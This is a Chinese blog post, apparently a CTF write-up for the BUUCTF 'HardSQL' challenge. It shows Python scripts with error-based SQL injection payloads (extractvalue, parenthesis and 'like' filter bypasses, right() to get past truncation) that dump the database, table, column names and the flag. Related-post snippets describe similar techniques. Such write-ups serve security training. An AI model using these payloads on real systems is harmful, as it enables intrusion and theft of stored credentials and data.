[极客大挑战 2019]HardSQL

最新推荐文章于 2024-02-19 14:06:52 发布
最新推荐文章于 2024-02-19 14:06:52 发布
阅读量198 收藏
点赞数
分类专栏: CTF 安全 WEB安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/satasun/article/details/108245587
版权
安全 同时被 3 个专栏收录
49 篇文章 6 订阅
订阅专栏
CTF
40 篇文章 1 订阅
订阅专栏
WEB安全
38 篇文章 0 订阅
订阅专栏

本题可以用报错注入搞定
在网页端搞太累了,直接写python利用python访问就行。

import requests
url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(database()),0x7e))^'1&password=12123"
print(requests.get(url).text)

得到数据库名geek
然后经测试发现过滤了空格和=
空格无法用/**/绕过,但是可以用括号绕过。

import requests
#url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(database()),0x7e))^'1&password=12123"
url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like'geek'),0x7e))^'1&password=12123"
print(requests.get(url).text)

得到表名H4rDsq1
然后

import requests
#url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(database()),0x7e))^'1&password=12123"
#url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like'geek'),0x7e))^'1&password=12123"
url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like'H4rDsq1'),0x7e))^'1&password=12123"
print(requests.get(url).text)

得到字段名id,username,password
最后

import requests
#url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(database()),0x7e))^'1&password=12123"
#url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like'geek'),0x7e))^'1&password=12123"
#url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like'H4rDsq1'),0x7e))^'1&password=12123"
url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1)),0x7e))^'1&password=12123"
print(requests.get(url).text)

得到了flag:flag{38ea110d-4a34-447c-bf94-4d,但是flag长得有点奇怪。
在这里插入图片描述
可能是长度太长了只输出了前一半。
可以用substr函数绕过,也可以用right函数绕过。看了一下已经输出31位了,目测后面的应该也不足20位,就干脆输出最后的20位,重复部分去掉即可。

import requests
#url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(database()),0x7e))^'1&password=12123"
#url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like'geek'),0x7e))^'1&password=12123"
#url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like'H4rDsq1'),0x7e))^'1&password=12123"
#url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1)),0x7e))^'1&password=12123"
url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(select(group_concat(right(password,20)))from(H4rDsq1)),0x7e))^'1&password=12123"
print(requests.get(url).text)

得到c-bf94-4dbef4ce8f85}
最后:flag{38ea110d-4a34-447c-bf94-4dbef4ce8f85}

imbia
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
SQL注入之——[极客挑战 2019]HardSQL
qq_35015835的博客
11-22 345
[极客挑战 2019]HardSQL 还是不断的放狠话。这次注释密码的方式也登录不上了。 通过暴力破解,可以发现被过滤的字符。 这里需要注意的是,在暴力破解这个过滤字符的时候,需要调低线程和重试的时间间隔,否则后面就会不断的报出**429的错误,表示请求数量过多**。 从上面的结果中可以看出,很多字符都被过滤,常用的联合注入的字符也不能使用,因此选择使用报错注入。 但是在构造报错注入语句时,发现了问题。 常规的报错注入语句为: or updatexml(1,concat(0x7e,database()
极客挑战2019Hard SQL注入解题
Bird&Bird
10-26 1233
1、打开BUUCTF在线评测,选择web----->【极客挑战2019HardSQL。 2、首先使用万能密码试一下,报错了。 3、普通方式union select注入,报同样错误 4、双写绕过试一下,还是报同样错误。 5、 那使用报错注入试一下吧。但其过滤了空格和=号,不过我们可以使用()代替空格,like代替=号。 爆库名 username=admin&password=123456'^extractvalue(1,concat(0x5c,(select(data.
[极客挑战 2019]HardSQL详细解析
最新发布
sinat_61654365的博客
02-19 464
抓包看看都过滤了些什么?长度为784的为过滤字段,过滤了很多,例如空格,sleep,insert,--+,<>,and,等于号,by,union,/**/等等在测试引号的时候存在报错,有关函数updatexml()和extractvalue()所以尝试报错注入并且过滤了空格使用()闭合子查询绕过括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。本文使用updatexml()
BUUCTF之[极客挑战 2019]HardSQL ----报错注入extractvalue和updatexml
weixin_44632787的博客
07-27 528
BUUCTF之[极客挑战 2019]HardSQL ----报错注入extractvalue和updatexml 题目 经过手工测试可以发现过滤:and,/**/,空格,等于号(=),大于号(>)和联合查询union等多个关键词 一般来说,SQL注入有这4个步骤: 爆数据库:select database() 爆数据表:select group_concat(table_name) from information_schema.tables where table_schema=databas
web buuctf [极客挑战 2019]HardSQL1
weixin_44214568的博客
03-15 1874
这题做了一下午,后来翻了一下别人的wp才发现,过滤了空格,服了。。 考点:报错注入 报错注入的应用是sql注入,页面无显示位,但有数据库的报错信息 报错注入使用函数(updatexml(xml_taget,xpath,new_xml)),这个函数是用来更新指定的xml文件,xpath的格式通常是为xx/xx/xx,传进去字符串就会报错,也就会显示报错信息, 利用updatexml(1,concat(0x7e,database()),2) concat函数将里面内容连成字符串,与xpath的格式不符
[极客挑战 2019]HardSQL 1
bring_coco的博客
09-23 4884
报错注入有两个函数,这里我们使用updatexml(a,b,c),此函数a,c必须为String类型,因此可以使a,c不为String型进行报错。得到id,username,password继续查询值。双写也被过滤掉了,同时空格,=,union也被过滤了。新知识:查不全时可用left(),right()经过一番查询知道right()查询后面部分。[极客挑战 2019]HardSQL。1.尝试输入数字或字母,都显示以下结果。发现flag并没有完全显示。两种方式都显示一样字样。4.我们尝试报错注入。
buuctf(hard sql)有待补充
qq_75005708的博客
04-12 133
exp(int)函数返回e的x次方,当x的值足够大的时候就会导致函数的结果数据类型溢出,也就会因此报错:"DOUBLE value is out of range",与xpath的格式不符,所以会报错,0x7e的axii码为~,xpath的格式通常是为xx/xx/xx,传进去字符串就会报错,也就会显示报错信息。查询完成,语句成功执行,返回值为0,再取反(~按位取反运算符),exp调用的时候e的那个数的次方,就会造成BigInt大数据类型溢出,就会报错。
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
2019年三诺集团四周年庆典极客摇滚跑活动方案
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
python极客项目编程pdf
03-31
python极客项目编程书籍,很好的一本深入学习python的书籍
[极客挑战 2019]LoveSQL 1
satasun的博客
05-20 9165
一个比较简单的SQL注入题目,写一下做个笔记。 看到登录直接盲猜账号密码admin和password,然后在账号处进行注入,结果还给我试对了。看了一下网上大佬们的做法,发现我就是捡了个漏,正确做法其实是利用万能密码登录,登录后进行注入。接下来把正规做法记录一下: 万能密码如下: 这里账号填1' or 1=1#,密码随便写。 登陆成功,看了一下url,是以get方式进行传参。先在username处测试一下有没有注入点: ?username=1' order by 1%23&password=ads
[GXYCTF2019]Ping Ping Ping
satasun的博客
05-21 5816
打开链接,页面提示/?ip= 猜测本题的意思是让我们把这个当做变量上传参数。 先输入127.0.0.1 看来把我们上传的东西当做ip来执行ping操作。 试试看能不能利用一下管道: ?ip=127.0.0.1;dir 诶,不行,dir是windows下的,说不定服务器是linux的 ?ip=127.0.0.1;ls 出现了flag.php,那么简单的? cat flag.php走起 ?ip=127.0.0.1;cat flag.php 嗯?过滤空格? 过滤空格的解决办法如下 $IFS ${IFS} $I
利用python脚本实现一招断网
satasun的博客
04-16 3892
看标题可能比较高大上,但是实际上需要一个前提条件:处在同一个内网环境下,通俗的意义上讲可以是在同一个WiFi下,但是内网的含义不止如此,想要了解的可以自行百度,这里不作补充 首先介绍一下原理 这里我们需要介绍一下ARP协议以及ARP攻击的实现方式 ARP(Address Resolution Protocol)地址解析协议,目的是实现IP地址到MAC地址的转换。 计算机在进行通信的时候,唯一标识...
[ThinkPHP]5.0.23-Rce 漏洞复现
satasun的博客
12-07 3865
[ThinkPHP]5.0.23-Rce 环境搭建 github传送门 BUU传送门 POC 老懒狗选择直接buu,链接 http://node3.buuoj.cn:27512/ 直接用poc打一下: POST /index.php?s=captcha HTTP/1.1 Host: node3.buuoj.cn:27512 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (com
极客挑战 2019]EasySQL
09-03
EasySQL极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要根据题目要求来编写 SQL 查询语句,从而得到正确的结果。这道题的目标是考察你对 SQL 查询语句的掌握程度和对数据库操作的理解。 在极客挑战 2019 中,EasySQL 是一个相对较简单的题目,旨在帮助参赛者熟悉 SQL 查询语句的基本使用和常见操作。通过解决这个问题,你将能够提高自己的 SQL 查询能力,并为更复杂的数据库操作打下基础。 如果你有关于 EasySQL 的具体问题,我可以帮助你更详细地解答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值